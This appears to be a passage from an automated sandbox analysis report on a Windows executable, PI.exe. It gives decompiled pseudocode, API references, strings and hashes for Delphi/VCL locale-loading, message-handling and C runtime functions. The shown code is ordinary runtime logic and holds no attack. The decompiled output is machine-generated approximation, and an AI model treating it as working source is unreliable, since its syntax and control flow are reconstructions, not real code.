GetProcAddress.KERNEL32(?,DecodePointer), ref: 00469092
__lock.LIBCMT ref: 004690B4
InterlockedIncrement.KERNEL32(004714D8), ref: 004690C1
__lock.LIBCMT ref: 004690D5
___addlocaleref.LIBCMT ref: 004690F3

Strings

KERNEL32.DLL, xrefs: 00469048, 0046904D, 00469058
EncodePointer, xrefs: 00469076
DecodePointer, xrefs: 0046908A

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 446bdaa037b88c6c9bf4748757ffd3d40409bf7de5d262b71bc4a4fea6bd75e1
Instruction ID: 58daeb605254e86ac56e4ddb523abfa4351203d999030d8ae3e001344f8c90ea
Opcode Fuzzy Hash: 446bdaa037b88c6c9bf4748757ffd3d40409bf7de5d262b71bc4a4fea6bd75e1
Instruction Fuzzy Hash: ED11A570944701AED7209F36DC45B8ABBF4AF01318F20852FE499933A1EBB89945CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0046AF60, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0046AF6C

Part of subcall function 0046919C: __getptd_noexit.LIBCMT ref: 0046919F
Part of subcall function 0046919C: __amsg_exit.LIBCMT ref: 004691AC

__amsg_exit.LIBCMT ref: 0046AF8C
__lock.LIBCMT ref: 0046AF9C
InterlockedDecrement.KERNEL32(?), ref: 0046AFB9
InterlockedIncrement.KERNEL32(006A2B80), ref: 0046AFE4

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 32a46e1f0cc87b95cebc73a3645c32cd7a8402bec13890db40bf82d1a0db82eb
Instruction ID: 5973b1c716e8803556d07fe03dc7c671833b5da4e6b8f7c5ec3b4fa470544ee5
Opcode Fuzzy Hash: 32a46e1f0cc87b95cebc73a3645c32cd7a8402bec13890db40bf82d1a0db82eb
Instruction Fuzzy Hash: 0A01C4B1D05A12ABCB1AAB29980579E77A0BB00759F04411BF40877291F73C6DA2DFDF

Uniqueness

Uniqueness Score: -1.00%

Function 00469577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00469595

Part of subcall function 00467445: __mtinitlocknum.LIBCMT ref: 0046745B
Part of subcall function 00467445: __amsg_exit.LIBCMT ref: 00467467
Part of subcall function 00467445: RtlEnterCriticalSection.NTDLL(?), ref: 0046746F

___sbh_find_block.LIBCMT ref: 004695A0
___sbh_free_block.LIBCMT ref: 004695AF
HeapFree.KERNEL32(00000000,?,004706D0,0000000C,00467426,00000000,00470600,0000000C,00467460,?,?,?,0046B525,00000004,004707D0,0000000C), ref: 004695DF
GetLastError.KERNEL32(?,0046B525,00000004,004707D0,0000000C,00469660,?,?,00000000,00000000,00000000,?,0046914E,00000001,00000214), ref: 004695F0

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a297fb4b6f0c708c8f9c82056fbda86c2435e71dbfb41c60bb572be44c2e379b
Instruction ID: 8199f6a0e627dde9b363d42a6e7a095ff6bd2cc2aab4c1475da124f0824bac4e
Opcode Fuzzy Hash: a297fb4b6f0c708c8f9c82056fbda86c2435e71dbfb41c60bb572be44c2e379b
Instruction Fuzzy Hash: 0E01A772846301BADF217F729C0A75E3A689F00368F10411FF505A6191FEBC8D80DA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0046ACC4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0046ACD0

Part of subcall function 0046919C: __getptd_noexit.LIBCMT ref: 0046919F
Part of subcall function 0046919C: __amsg_exit.LIBCMT ref: 004691AC

__getptd.LIBCMT ref: 0046ACE7
__amsg_exit.LIBCMT ref: 0046ACF5
__lock.LIBCMT ref: 0046AD05

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3207db1baa4ef3fc740770985068373a65c559458dcf3315a8af2b83d108a52d
Instruction ID: 5c42368c435b43edfdcab61dcd5dcb0b0ca434c413552d6f7fbd3374e954fec8
Opcode Fuzzy Hash: 3207db1baa4ef3fc740770985068373a65c559458dcf3315a8af2b83d108a52d
Instruction Fuzzy Hash: 24F09631940B018FEB20FB759806B8973A06F01719F10461FE444A76D1FB7C5841CE9F

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PI.exe PID: 4600 Parent PID: 6512 PI.exeCOMMON

Executed Functions

Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405CA0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405da5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AE8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405DAC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401340();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401338();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401338();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401338();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Locales, xrefs: 00405CD0, 00405CEE
Software\Borland\Delphi\Locales, xrefs: 00405D0C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00454858, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454858(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x454ee8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E0045470C(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004567B0(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E004547D0(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00455454(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004553F8(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044C778(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00455938(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043C1F4(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043C1F4(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043C1F4(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x476b48 = 0;
											_t206 = GetFocus();
											SetFocus(E0043C1F4(_t367));
											E00436D28(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x476b48 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E004552D0(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00454F4C(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00454FFC(_v8);
								} else {
									E004547D0(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00454F30(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BBA4("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x492c08; // 0x221094c
							E00453D74(_t267);
							E004547D0(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x491244; // 0x492b6c
							E004408B4( *_t271, _t312,  *(_v12 + 4));
							E00454764(_v8, _t303, _t312, _v12, _t365);
							E004547D0(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E004547D0(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00454660();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00454670(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004548FC))) {
						case 0:
							__eax = E0041C04C();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004070D4();
							__eax = E004547D0(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004547D0(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C628( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00454668();
							} else {
								_v8 = E00454670(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004547D0(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00407034();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004547D0(__ebp);
							} else {
								__eax = E0045480C(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00451FDC(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004547D0(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004141BC( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}

Strings

vcltest3.dll, xrefs: 00454C30
l+I, xrefs: 00454E9D
RegisterAutomation, xrefs: 00454C51

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$l+I$vcltest3.dll
API String ID: 0-4006344421
Opcode ID: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction ID: ce7447678082689d4ce0267b8534b48c9ee2a8186bb98f6d1640a9c28f0ad015
Opcode Fuzzy Hash: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction Fuzzy Hash: 8BE16034604508EFDB10DB59C58AA5EB7F1BB84319F1481AAEC049F357C738EE89DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405DAC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401340();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401338();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401338();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401338();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Locales, xrefs: 00405CD0, 00405CEE
Software\Borland\Delphi\Locales, xrefs: 00405D0C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
